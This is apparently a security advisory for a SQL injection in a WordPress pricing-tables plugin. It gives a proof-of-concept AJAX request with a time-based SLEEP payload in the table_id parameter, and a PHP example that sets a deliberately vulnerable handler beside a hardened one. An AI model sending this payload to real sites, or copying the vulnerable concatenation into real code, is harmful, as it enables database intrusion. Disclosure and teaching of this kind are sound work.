The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high-privilege users such as admins.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 115
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://localhost/wp-admin/admin.php?page=ap-pricing-tables-lite
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [Admin+]
Connection: close

action=backend_ajax&_action=copy_table&table_id=124+AND+(SELECT+2035+FROM+(SELECT(SLEEP(10)))A)&_wpnonce=<nonce>
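The pattern behind this class of bug, next to a hardened form, as an added example that is not the plugin's own code. The function names, nonce action, capability, hook name and table name are assumptions, and the code is meant to run inside WordPress.

```php
<?php
// Hypothetical AJAX handlers (assumed names, not taken from the plugin).

// Before: table_id is concatenated into the statement. The value sits in a
// numeric context, so quote escaping (esc_sql, magic quotes) does not help:
// "124 AND (SELECT 2035 FROM (SELECT(SLEEP(10)))A)" contains no quotes.
// The nonce check passes as well, because the request carries a valid nonce.
function example_copy_table_vulnerable() {
    global $wpdb;
    check_ajax_referer( 'example-backend-nonce', '_wpnonce' );
    $table_id = $_POST['table_id']; // raw request value
    $table    = $wpdb->prefix . 'example_pricing_tables'; // assumed table name
    return $wpdb->get_row( "SELECT * FROM {$table} WHERE id = {$table_id}", ARRAY_A );
}

// After: reject anything that is not a plain decimal integer, then bind the
// value with a %d placeholder so it can never become SQL syntax.
function example_copy_table_hardened() {
    global $wpdb;
    check_ajax_referer( 'example-backend-nonce', '_wpnonce' );
    if ( ! current_user_can( 'manage_options' ) ) { // assumed capability
        wp_send_json_error( 'forbidden', 403 );
    }

    $raw = isset( $_POST['table_id'] ) ? wp_unslash( $_POST['table_id'] ) : '';
    if ( ! is_string( $raw ) || ! ctype_digit( $raw ) ) {
        wp_send_json_error( 'invalid table_id', 400 ); // sends JSON and exits
    }
    $table_id = absint( $raw );

    $table = $wpdb->prefix . 'example_pricing_tables'; // assumed table name
    $row   = $wpdb->get_row(
        $wpdb->prepare( "SELECT * FROM {$table} WHERE id = %d", $table_id ),
        ARRAY_A
    );
    if ( null === $row ) {
        wp_send_json_error( 'table not found', 404 );
    }

    unset( $row['id'] );           // let the database assign a new id
    $wpdb->insert( $table, $row ); // insert() builds a prepared statement itself
    wp_send_json_success( array( 'new_id' => $wpdb->insert_id ) );
}
add_action( 'wp_ajax_example_copy_table', 'example_copy_table_hardened' );
```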
Simone Onofri, Donato Onofri
Yes
2023-05-10 (about 4 months ago)